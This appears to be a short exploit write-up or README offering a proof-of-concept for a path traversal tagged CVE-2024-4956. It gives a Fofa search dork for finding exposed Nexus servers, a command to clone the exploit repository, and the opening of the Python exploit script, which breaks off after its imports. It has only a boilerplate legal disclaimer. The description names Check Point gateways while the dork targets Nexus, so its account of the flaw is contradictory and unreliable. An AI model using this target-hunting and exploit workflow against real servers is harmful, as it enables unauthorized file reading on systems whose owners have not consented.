POC — CVE-2024–4956 -Unauthenticated Path Traversal
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with Remote Access VPN or Mobile Access Software Blades. A security fix that mitigates this vulnerability is available.
Read about it — CVE-2024–4956
Disclaimer: This Proof of Concept (POC) is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
For full article click here
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):
- Fofa Dork:
header="Server: Nexus/3.53.0-01 (OSS)"
First, clone the repository:
git clone https://github.com/verylazytech/CVE-2024-4956Or copy code manually:
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow =…